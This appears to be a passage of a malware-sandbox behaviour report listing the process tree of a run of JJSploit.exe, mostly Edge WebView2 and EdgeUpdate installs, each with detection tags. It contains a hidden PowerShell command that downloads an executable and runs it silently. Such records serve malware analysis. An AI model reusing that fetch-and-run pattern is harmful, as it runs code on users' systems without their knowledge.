C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=4964,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5440 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4952,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1928 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4588,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1140 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4232,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:85⤵
- Executes dropped EXE
PID:2840 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:1932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -windowstyle hidden try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 } catch {}; Invoke-WebRequest -Uri "https://go.microsoft.com/fwlink/p/?LinkId=2124703" -OutFile "$env:TEMP\MicrosoftEdgeWebview2Setup.exe" ; Start-Process -FilePath "$env:TEMP\MicrosoftEdgeWebview2Setup.exe" -ArgumentList ('/silent', '/install') -Wait2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe" /silent /install3⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2608 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:440 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3672 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:944 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMxNEMwNzctRTY4Mi00NENFLTkwREMtRTRCNkUyQzJEQjBBfSIgdXNlcmlkPSJ7MUIzNTJEQzktRTM5RC00MEI5LUFENDktRjIxOTI4REZCNUQwfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins0QzM4OTQyQi1BNDY5LTRCRDctQTQ1RC00MDZCNEIyNTA2REZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjI1IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTQwMzEwNTM4IiBpbnN0YWxsX3RpbWVfbXM9IjQzOCIvPjwvYXBwPjwvcmVxdWVzdD45⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2712 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{A314C077-E682-44CE-90DC-E4B6E2C2DB0A}" /silent5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3696
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3320
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMxNEMwNzctRTY4Mi00NENFLTkwREMtRTRCNkUyQzJEQjBBfSIgdXNlcmlkPSJ7MUIzNTJEQzktRTM5RC00MEI5LUFENDktRjIxOTI4REZCNUQwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7Rjc5MThCODItRjdGRC00RUQzLTk0NkQtQkQ5MDYzMjE1NEE0fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M2MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIxMjMuMC42MzEyLjEyMyIgbmV4dHZlcnNpb249IiIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMTYiIGluc3RhbGxkYXRldGltZT0iMTcyODI5MzQ0MCIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzcyNzY2MTEwMzk2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxNDY0MDQ1MTciLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4380 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\MicrosoftEdge_X64_130.0.2849.52.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level3⤵
- Checks computer location settings
- Drops file in Program Files directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=130.0.6723.59 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=130.0.2849.52 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff7fa8ed730,0x7ff7fa8ed73c,0x7ff7fa8ed7484⤵
- Executes dropped EXE
PID:2736 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMxNEMwNzctRTY4Mi00NENFLTkwREMtRTRCNkUyQzJEQjBBfSIgdXNlcmlkPSJ7MUIzNTJEQzktRTM5RC00MEI5LUFENDktRjIxOTI4REZCNUQwfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntFRUZFNjg5MS1GREMwLTRCNkItQjQwMy00MEZDNEM0QjFEODd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMwLjAuMjg0OS41MiIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTE2MTA5MjA1NCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxNjEwOTIwNTQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NDc1MTU0NzMxIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuZi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy85OTI5Y2ZmNC0zNDg3LTQ4MDUtOTNmNy04NmFjYjgxM2UyNmI_UDE9MTczMDMwNzEzMyZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1YbkVUY1V6ZXg2aVo2ZG9ZNEVLcURIaFR3NDlzaUsxc1c5NUh5d0lTTnFIeXZ3U003WnJXQUglMmJqRkVVUUpCSnpUbSUyZkRaN2RSRE1PSm5tSE5IR3lwQ2clM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIxNzQ5MjU5MDQiIHRvdGFsPSIxNzQ5MjU5MDQiIGRvd25sb2FkX3RpbWVfbXM9IjEyNDQ2OSIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjY0NzUzMTA2NDEiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NDg5MjE3MTI1IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MDk3NDk4OTMwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iODc1IiBkb3dubG9hZF90aW1lX21zPSIxMzEzOTEiIGRvd25sb2FkZWQ9IjE3NDkyNTkwNCIgdG90YWw9IjE3NDkyNTkwNCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNjA4MjkiLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Modifies data under HKEY_USERS
PID:3220
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4940
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5160
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5644
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5152 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{75C20470-CFD8-4174-9D3B-71F5A1C4A15A}\MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{75C20470-CFD8-4174-9D3B-71F5A1C4A15A}\MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe" /update /sessionid "{B184DA84-C1C0-4FFE-A4B8-33B0D50489F0}"2⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5600 -
C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{B184DA84-C1C0-4FFE-A4B8-33B0D50489F0}"3⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5460 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5496 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4928 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1940 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Modifies registry class
PID:4944 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Modifies registry class
PID:4624 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QjE4NERBODQtQzFDMC00RkZFLUE0QjgtMzNCMEQ1MDQ4OUYwfSIgdXNlcmlkPSJ7MUIzNTJEQzktRTM5RC00MEI5LUFENDktRjIxOTI4REZCNUQwfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QTZDOEVGMEMtMDQ2RS00MjI2LUI1MzUtRDkxRjNEMTE3OTZGfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O2xoVmkxMlFjazZTbDB1VTFPQjZZMTUyOWJSNmJzZXk0K2N1N2RIeHM2Y2s9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xOTUuMjUiIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjI3IiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMCIgaW5zdGFsbGRhdGV0aW1lPSIxNzI5NzAyMzI5Ij48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI4NTYzNDgyOTE3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg4⤵
- Checks system information in the registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5896 -
